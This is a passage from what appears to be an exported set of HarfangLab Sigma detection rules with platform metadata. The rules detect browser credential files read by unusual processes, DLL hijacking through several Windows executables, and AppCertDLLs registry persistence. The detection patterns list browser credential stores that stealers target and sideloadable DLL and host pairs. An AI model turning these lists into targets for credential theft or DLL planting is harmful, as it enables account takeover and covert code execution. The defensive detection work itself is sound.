filesystem_read\ndetection:\n selection_chromium:\n ProcessImage|contains: '?'\n Path|contains:\n - '\\AppData\\Local\\Yandex\\YandexBrowser\\User Data'\n - '\\AppData\\Local\\Iridium\\User Data'\n - '\\AppData\\Local\\Chromium\\User Data'\n - '\\AppData\\Local\\7Star\\7Star\\User Data'\n - '\\AppData\\Local\\Torch\\User Data'\n - '\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data'\n - '\\AppData\\Local\\Kometa\\User Data'\n - '\\AppData\\Local\\Amigo\\User Data'\n - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data'\n - '\\AppData\\Local\\CentBrowser\\User Data'\n - '\\AppData\\Local\\Chedot\\User Data'\n - 
'\\AppData\\Local\\Orbitum\\User Data'\n - '\\AppData\\Local\\Sputnik\\Sputnik\\User Data'\n - '\\AppData\\Local\\Comodo\\Dragon\\User Data'\n - '\\AppData\\Local\\360Chrome\\Chrome\\User Data'\n - '\\AppData\\Local\\uCozMedia\\Uran\\User Data'\n - '\\AppData\\Local\\liebao\\User Data'\n - '\\AppData\\Local\\Elements Browser\\User Data'\n - '\\AppData\\Local\\Epic Privacy Browser\\User Data'\n - '\\AppData\\Local\\CocCoc\\Browser\\User Data'\n - '\\AppData\\Local\\QIP Surf\\User Data'\n - '\\AppData\\Local\\Coowon\\Coowon\\User Data'\n - '\\AppData\\Local\\Google\\Chrome\\User Data'\n - '\\AppData\\Local\\Microsoft\\Edge\\User Data'\n - '\\AppData\\Local\\Tencent\\QQBrowser\\User Data'\n\n selection_firefox:\n ProcessImage|contains: '?'\n Path|contains:\n - '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'\n - '\\AppData\\Roaming\\Waterfox\\Profiles'\n - '\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\Profiles'\n - '\\AppData\\Roaming\\librewolf\\Profiles'\n - '\\AppData\\Roaming\\Basilisk\\Profiles'\n - '\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles'\n - '\\Browser\\TorBrowser\\Data\\Browser\\profile.default'\n - '\\Comodo\\IceDragon\\Profiles'\n\n selection_files:\n Path|contains:\n - '\\logins.json'\n - '\\cert9.db'\n - '\\key4.db'\n - '\\cookies.sqlite'\n - '\\cookies.sqlite3'\n - '\\formhistory.sqlite'\n - '\\formhistory.sqlite3'\n - '\\places.sqlite'\n - '\\places.sqlite3'\n - '\\Login Data'\n - '\\Cookies'\n - '\\Bookmarks'\n - '\\History'\n - '\\Web Data'\n\n filter_browsers:\n ProcessImage|endswith:\n - '\\ChromiumPortable.exe'\n - '\\YandexBrowser.exe' # Chromium Based Browsers\n - '\\yandex.exe'\n - '\\iridium.exe'\n - '\\chrome.exe'\n - '\\chromium.exe'\n - '\\7star.exe'\n - '\\7xing.exe'\n - '\\torch.exe'\n - '\\chromeplus.exe'\n - '\\kometa.exe'\n - '\\amigo.exe'\n - '\\brave.exe'\n - '\\centbrowser.exe'\n - '\\chedot.exe'\n - '\\orbitum.exe'\n - '\\sputnik.exe'\n - '\\dragon.exe'\n - '\\vivaldi.exe'\n - '\\citrio.exe'\n - '\\360chrome.exe'\n 
- '\\uran.exe'\n - '\\liebao.exe'\n - '\\elementsbrowser.exe'\n - '\\epic.exe'\n - '\\coccocbrowser.exe'\n - '\\qipsurf.exe'\n - '\\coowon.exe'\n - '\\msedge.exe'\n - '\\qqbrowser.exe'\n - '\\firefox.exe' # Firefox Based Browsers\n - '\\waterfox.exe'\n - '\\palemoon.exe'\n - '\\librewolf.exe'\n - '\\basilisk.exe'\n - '\\seamonkey.exe'\n - '\\icedragon.exe'\n - '\\Zen Browser\\zen.exe'\n\n # AV products may scan different browser files, such as cache or extensions.\n # The exclusion for cache/extension read should handle most of them.\n # The problem is some them read absolutely everything.\n filter_installers:\n ProcessImage|endswith:\n - '\\AppData\\Local\\\\*\\Update\\Install\\\\*.exe' # Chromium Installers\n - '\\AppData\\Local\\\\*\\Installer\\setup.exe'\n\n # Too many signed AV and other programs to exclude by hand.\n filter_signed:\n ProcessSigned: 'true'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n # Lot of programs have their own unsigned certutil.exe\n exclusion_certutil:\n ProcessImage|endswith: 'certutil.exe'\n\n exclusion_libre_office:\n ProcessImage|endswith:\n - 'soffice.bin'\n - 'soffice.exe'\n ProcessCompany|contains:\n - 'LibreOffice'\n - 'OpenOffice'\n\n # Most custom unsigned browsers have \"The Chromium Authors\" as CompanyName\n exclusion_custom_chromium:\n ProcessCompany: \"The Chromium Authors\"\n\n exclusion_snmp_walk:\n ProcessImage|endswith: '\\LANDesk\\LDClient\\snmpwalk.exe'\n\n exclusion_wazuh:\n ProcessImage|endswith: '\\ossec-agent\\wazuh-agent.exe'\n\n exclusion_burp:\n ProcessImage|endswith: '\\Burp\\bin\\burp.exe'\n\n exclusion_fortify:\n ProcessImage|endswith: '\\Fortify\\fortify.exe'\n ProcessCompany: 'Peculiar Ventures'\n\n exclusion_spiceworks:\n ProcessImage|endswith: '\\Spiceworks\\Agent\\Spiceworks Agent Service.exe'\n ProcessCompany: 'Spiceworks, Inc.'\n\n exclusion_open_videopresence:\n ProcessImage|endswith: '\\Open 
Videopresence\\open-videopresence.exe'\n ProcessCompany: 'Orange'\n\n exclusion_zenworks:\n ProcessImage|endswith: 'Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n ProcessCompany: 'Novell, Inc.'\n\n exclusion_forticlient:\n ProcessImage|endswith: '\\Fortinet\\FortiClient\\fmon.exe'\n ProcessCompany: 'Fortinet Inc.'\n\n exclusion_scrobbler:\n ProcessImage|endswith: '\\Vidoc\\Scrobbler\\VidocScrobbler.exe'\n\n exclusion_clamav:\n ProcessImage|endswith: '\\ClamWin\\bin\\clamscan.exe'\n ProcessCompany: 'ClamWin Antivirus'\n\n exclusion_7z_1:\n ProcessImage|endswith: '\\7-Zip\\7z.exe'\n ProcessCompany: 'Igor Pavlov'\n exclusion_7z_2:\n ProcessOriginalFileName: '7za.exe'\n ProcessCompany: 'Igor Pavlov'\n\n exclusion_flow_launcher:\n ProcessImage|endswith: '\\Flow.Launcher.exe'\n ProcessCompany: 'Flow Launcher'\n\n # Excluding these because of signature issues in the agent which is RUINING MY FP RATE\n exclusion_bitdefender:\n ProcessImage|endswith: '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n ProcessCompany: 'Bitdefender'\n\n # May God have mercy for I won't.\n exclusion_microsoft:\n ProcessCompany|contains: 'Microsoft'\n\n exclusion_pspad:\n ProcessImage|endswith: 'PSPad Editor\\PSPad'\n ProcessCompany: 'Prog-Soft s.r.o.'\n\n exclusion_git:\n ProcessImage|endswith:\n - '\\AppData\\Local\\Programs\\Git\\usr\\bin\\du.exe'\n - '\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n\n exclusion_velociraptor:\n ProcessOriginalFileName: 'Velociraptor.exe'\n ProcessCompany: 'Rapid 7 Inc'\n ProcessDescription: 'Velociraptor: Digging Deeper!'\n\n exclusion_supercopier:\n ProcessCompany: 'SFX TEAM'\n ProcessDescription: 'SuperCopier 2 (explorer file copy replacement)'\n ProcessInternalName: 'SuperCopier2'\n\n exclusion_ccleaner:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessCompany: 'Piriform Software Ltd'\n ProcessDescription: 'CCleaner'\n\n exclusion_keypirinha:\n ProcessOriginalFileName: 'keypirinha-x64.exe'\n ProcessCompany: 'Jean-Charles Lefebvre'\n 
ProcessDescription: 'Keypirinha'\n\n exclusion_cookiefix:\n ProcessOriginalFileName: 'CookieFix.dll'\n ProcessCompany: 'CookieFix'\n ProcessDescription: 'CookieFix'\n\n exclusion_rsync:\n ProcessImage:\n - '?:\\cygwin\\bin\\rsync.exe'\n - '?:\\cygwin64\\bin\\rsync.exe'\n - '?:\\rsync\\usr\\bin\\rsync.exe'\n - '?:\\\\*\\Tools\\Rsync\\bin\\rsync.exe'\n - '*\\MobaXterm\\slash\\bin\\rsync.exe'\n\n exclusion_duplicati:\n ProcessImage: '?:\\ProgramData\\Duplicati\\updates\\\\*\\Duplicati.GUI.TrayIcon.exe'\n\n exclusion_zhpcleaner:\n ProcessProduct: 'ZHPcleaner'\n ProcessCompany: 'Nicolas Coolman'\n\n exclusion_adwcleaner:\n ProcessOriginalFileName: 'AdwCleaner.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_clbackup:\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessCompany: 'Commvault'\n\n condition: (selection_chromium or selection_firefox) and selection_files and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9584cb1b-7b89-49ee-82d2-5cf2f2cef3fd",
"rule_name": "Browser Data Read by Unusual Process",
"rule_description": "Detects an attempt to read browser data files from an unusual process.\nThis may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to perform an investigation to determine the specific malware used, what information has been exfiltrated and change the credentials of the affected users.\nFurther information about different stealers is present in the references.\n",
"rule_creation_date": "2023-05-04",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95af5d1d-59ae-4c66-aab0-c03f4c84b280",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601573Z",
"creation_date": "2026-03-23T11:45:34.601577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601585Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sndvol.yml",
"content": "title: DLL Hijacking via SndVol.exe\nid: 95af5d1d-59ae-4c66-aab0-c03f4c84b280\ndescription: |\n Detects potential Windows DLL Hijacking via SndVol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SndVol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\mmdevapi.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95af5d1d-59ae-4c66-aab0-c03f4c84b280",
"rule_name": "DLL Hijacking via SndVol.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SndVol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95bd2930-2a9d-46a0-8810-77de1fa84fbe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597560Z",
"creation_date": "2026-03-23T11:45:34.597566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsmgmt.yml",
"content": "title: DLL Hijacking via dsmgmt.exe\nid: 95bd2930-2a9d-46a0-8810-77de1fa84fbe\ndescription: |\n Detects potential Windows DLL Hijacking via dsmgmt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsmgmt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samlib.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95bd2930-2a9d-46a0-8810-77de1fa84fbe",
"rule_name": "DLL Hijacking via dsmgmt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsmgmt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95e02498-70d3-402d-b84b-4583d48d3396",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090003Z",
"creation_date": "2026-03-23T11:45:34.090005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090009Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://attack.mitre.org/techniques/T1546/009/"
],
"name": "t1546_009_persistence_registry_appcert_dlls.yml",
"content": "title: Registry AppCert DLLs Modified\nid: 95e02498-70d3-402d-b84b-4583d48d3396\ndescription: |\n Detects the modification of the AppCertDLLs key in registry.\n Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.\n Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key are loaded into every process that calls the ubiquitously used application programming interface (API) functions like CreateProcess, CreateProcessAsUser, ...\n It is recommended to investigate the process at the origin of the registry modification to determine whether this action is legitimate.\nreferences:\n - https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\n - https://attack.mitre.org/techniques/T1546/009/\ndate: 2020/09/24\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.009\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppCertDLLs' # AppCertDLLs\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppCertDLLs' # AppCertDLLs\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95e02498-70d3-402d-b84b-4583d48d3396",
"rule_name": "Registry AppCert DLLs Modified",
"rule_description": "Detects the modification of the AppCertDLLs key in registry.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.\nDynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key are loaded into every process that calls the ubiquitously used application programming interface (API) functions like CreateProcess, CreateProcessAsUser, ...\nIt is recommended to investigate the process at the origin of the registry modification to determine whether this action is legitimate.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95ff9084-6538-444d-acf3-7fffad95e7f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590598Z",
"creation_date": "2026-03-23T11:45:34.590603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590615Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wcchromenativemessaginghost.yml",
"content": "title: DLL Hijacking via WCChromeNativeMessagingHost.exe\nid: 95ff9084-6538-444d-acf3-7fffad95e7f5\ndescription: |\n Detects potential Windows DLL Hijacking via WCChromeNativeMessagingHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WCChromeNativeMessagingHost.exe'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n ImageLoaded|endswith: '\\vcruntime140.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Adobe\\Acrobat *\\Acrobat\\Browser\\WCChromeExtn\\'\n - '?:\\Program Files (x86)\\Adobe\\Acrobat *\\Acrobat\\Browser\\WCChromeExtn\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95ff9084-6538-444d-acf3-7fffad95e7f5",
"rule_name": "DLL Hijacking via WCChromeNativeMessagingHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WCChromeNativeMessagingHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-05-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "961445af-546f-4e48-a76f-f49a656805ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081706Z",
"creation_date": "2026-03-23T11:45:34.081709Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081713Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eudcedit.yml",
"content": "title: DLL Hijacking via EUDCEDIT.exe\nid: 961445af-546f-4e48-a76f-f49a656805ea\ndescription: |\n Detects potential Windows DLL Hijacking via EUDCEDIT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EUDCEDIT.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mfc42u.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "961445af-546f-4e48-a76f-f49a656805ea",
"rule_name": "DLL Hijacking via EUDCEDIT.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EUDCEDIT.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "967f9803-c95f-4591-a904-25a2f478158a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
